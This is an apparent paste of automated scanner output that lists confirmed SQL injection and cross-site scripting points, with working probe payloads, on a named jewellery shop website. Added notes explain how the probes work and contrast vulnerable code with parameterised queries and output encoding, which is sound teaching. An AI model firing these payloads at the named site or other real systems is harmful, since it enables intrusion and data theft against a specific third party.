sroub3k

zebaishjewellers.com

Mar 18th, 2012
||| SQL Injection

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&category=43
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

||| [High Possibility] SQL Injection
Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=%27
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: %27

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=NSFTW
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: NSFTW

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/newarival.php?page=%27
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: page
Parameter Type: Querystring
Attack Pattern: %27

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/Featured.php?page=%27
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: page
Parameter Type: Querystring
Attack Pattern: %27

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/products.php?page=%27
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: page
Parameter Type: Querystring
Attack Pattern: %27

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id=%27&category=43
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: %27

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: color
Parameter Type: Post
Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: productid
Parameter Type: Post
Attack Pattern: %27

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: qty
Parameter Type: Post
Attack Pattern: %27

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: size
Parameter Type: Post
Attack Pattern: %27

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?save=%27
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: save
Parameter Type: Querystring
Attack Pattern: %27

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?del=%27&id=2310
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: del
Parameter Type: Querystring
Attack Pattern: %27

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?cancel=%27
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: cancel
Parameter Type: Querystring
Attack Pattern: %27

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php?save=convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: save
Parameter Type: Querystring
Attack Pattern: convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: id
Parameter Type: Post
Attack Pattern: %27

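Editor's note on the SQL Injection findings above, with an added Python example that is not part of the scanner report. Every entry in this section rests on one observation: a value from the query string or POST body reaches the database as SQL text. The %27 probe is a lone single quote, which breaks the statement; NSFTW is a bare word that only produces an error if the value is used unquoted, so the id parameter sits in a numeric context, which is also why the first finding's payload needs no quote. The two long payloads are a MySQL error-based probe (the floor(rand()*2) ... group by duplicate-key trick) and an MSSQL one (convert(int, ...) FROM syscolumns); their CHAR() sequences spell out a marker string that the resulting database error echoes back, and the scanner searches the response for it. That a MySQL probe and an MSSQL probe are both marked Confirmed against one PHP application shows the scanner confirms on a reflected database error, not on data being extracted, and the many per-parameter entries for shoppingcart.php most likely share a single query path; each entry still needs to be verified by hand before it is counted as a separate bug. The example below was written for this page: it uses SQLite standing in for the shop's database and an assumed products table, decodes the markers, and contrasts string concatenation with a type-checked bound parameter.

```python
# Added example, not part of the scanner report above. It reproduces what the
# SQL Injection findings rest on: the single quote (%27) and the CHAR()-encoded
# probes only have an effect because the id parameter is spliced into a query
# as text. The table, column names and PHP internals are assumptions; SQLite
# stands in for the shop's real database.
import re
import sqlite3
from urllib.parse import unquote

# Attack patterns copied from the findings above.
MYSQL_PROBE = (
    "(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),"
    "CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),"
    "CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a "
    "group by x limit 1))"
)
MSSQL_PROBE = (
    "(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)"
    "+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)"
)


def decode_char_marker(payload: str) -> str:
    """Decode the CHAR(n) sequence a probe carries its marker string in.

    The MySQL probe forces a duplicate-key error of the form
    "Duplicate entry '<marker>:1' for key 'group_key'" and the MSSQL probe a
    "Conversion failed when converting the varchar value '<marker>'" error.
    Both echo the marker, so the scanner only has to look for it in the body.
    """
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", payload))


def demo_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the shop's product table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, category INTEGER)"
    )
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "Gold bangle", 43), (2, "Silver ring", 43)],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str):
    """What productdetail.php?id=... evidently does: URL-decode the parameter
    and concatenate it into the statement. The id sits in a numeric context,
    which is why the report's first probe needs no quote at all."""
    query = "SELECT name FROM products WHERE id = " + unquote(raw_id)
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def safe_lookup(conn: sqlite3.Connection, raw_id: str):
    """Hardened form: check the type, then bind the value as a parameter so the
    database never parses it as SQL. Binding alone stops the injection; the
    type check additionally turns garbage input into a clean "not found"."""
    value = unquote(raw_id)
    if not value.isdigit():
        return None
    row = conn.execute(
        "SELECT name FROM products WHERE id = ?", (int(value),)
    ).fetchone()
    return row[0] if row else None


def probe(lookup, conn: sqlite3.Connection, raw_id: str) -> str:
    """Run one request the way the scanner judges it: a normal page, an empty
    page, or a database error leaking into the response."""
    try:
        result = lookup(conn, raw_id)
    except sqlite3.Error as exc:
        return f"DB ERROR: {exc}"
    return "no product" if result is None else f"product: {result}"


if __name__ == "__main__":
    print(decode_char_marker(MYSQL_PROBE), decode_char_marker(MSSQL_PROBE))
    conn = demo_db()
    for raw in ("1", "%27", "2%20OR%201=1", MYSQL_PROBE):
        print(f"{raw[:40]:42} vuln: {probe(vulnerable_lookup, conn, raw):45} "
              f"safe: {probe(safe_lookup, conn, raw)}")
```

Running the block prints the two markers the probes decode to and then, for each input, what the concatenating and the parameterised lookups return: the quote and the MySQL probe surface a database error only through the concatenating version, and "2 OR 1=1" changes which product comes back there while the bound version simply finds nothing.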
||| XSS (Cross-site Scripting)

Severity : Important
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id='"--></style></script><script>alert(0x0000E2)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x0000E2)</script>

Severity : Important
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/productdetail.php?id='"--></style></script><script>alert(0x000150)</script>&category=43
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000150)</script>

Severity : Important
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: qty
Parameter Type: Post
Attack Pattern: '" ns=alert(0x0002D5)

||| [Possible] Permanent Cross-site Scripting

Severity : Important
Confirmation : Confirmed
Vulnerable URL : http://zebaishjewellers.com/shoppingcart.php
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Injection URL: http://zebaishjewellers.com/shoppingcart.php
Parameter Name: qty
Parameter Type: Post
Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
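
Editor's note on the two XSS sections above, with an added Python example that is not part of the scanner report. The reflected probes are context-breaking payloads: the first opens with '"--> followed by closing </style> and </script> tags so that wherever the id value lands (an HTML comment, a style or script block, a quoted attribute or plain text) the <script> that follows opens in element context; the second, '" ns=alert(...), only closes a quoted attribute and adds a new one, which is the minimal test for attribute-context injection (an attacker would put an event-handler attribute where ns is). The [Possible] Permanent Cross-site Scripting entry carries the scanner's MSSQL probe string as its attack pattern rather than any markup: read together with the Injection URL field, it appears to record that a qty value submitted to shoppingcart.php was stored and echoed on a later request, which is the precondition for stored XSS, not a demonstration of it, so it needs manual confirmation with a script payload in qty. The example below assumes the page markup (the report only says which parameters reflect), renders the two probes through a verbatim template and through one that entity-encodes its output, and reads both results with an HTMLParser pass the way a browser's tokenizer would.

```python
# Added example, not part of the scanner report above. It shows why the two
# XSS probes in the report fire and what output encoding does to them. The page
# markup is assumed; the report only tells us which parameters are reflected.
import html
from html.parser import HTMLParser

# Attack patterns copied from the findings above.
REFLECTED_PROBE = "'\"--></style></script><script>alert(0x0000E2)</script>"
ATTRIBUTE_PROBE = "'\" ns=alert(0x0002D5)"


def render_unsafe(product_id: str, qty: str) -> str:
    """Parameters copied into HTML verbatim, as the findings indicate
    productdetail.php (id) and shoppingcart.php (qty) do."""
    return (
        f"<h1>Product {product_id}</h1>\n"
        f'<input name="qty" value="{qty}">'
    )


def render_safe(product_id: str, qty: str) -> str:
    """Hardened form: entity-encode for the context the value lands in.
    html.escape(quote=True) encodes & < > " and ', which is enough for
    element content and for a double-quoted attribute value."""
    return (
        f"<h1>Product {html.escape(product_id)}</h1>\n"
        f'<input name="qty" value="{html.escape(qty, quote=True)}">'
    )


class TagCollector(HTMLParser):
    """Record start tags and their attributes as a browser tokenizer would."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(page: str) -> list:
    parser = TagCollector()
    parser.feed(page)
    parser.close()
    return parser.tags


def script_tags(page: str) -> int:
    """Number of <script> start tags. The first probe injects exactly one; its
    '"--></style></script> prefix closes whatever context the value landed in."""
    return sum(1 for tag, _ in parse_tags(page) if tag == "script")


def input_attrs(page: str) -> dict:
    """Attributes of the qty input. The second probe tests attribute context:
    a '" that ends the quoted value lets ns=... become a new attribute; swap
    ns for onfocus and it is an event handler."""
    for tag, attrs in parse_tags(page):
        if tag == "input":
            return attrs
    return {}


if __name__ == "__main__":
    for label, page in (
        ("unsafe", render_unsafe(REFLECTED_PROBE, ATTRIBUTE_PROBE)),
        ("safe", render_safe(REFLECTED_PROBE, ATTRIBUTE_PROBE)),
    ):
        print(label, "script tags:", script_tags(page),
              "input attrs:", sorted(input_attrs(page)))
```

With the verbatim template the parser sees one injected <script> element and an extra ns attribute on the input; with the encoding template it sees no script element and a single value attribute whose decoded content is the probe string itself, which is exactly what a product page should do with untrusted text.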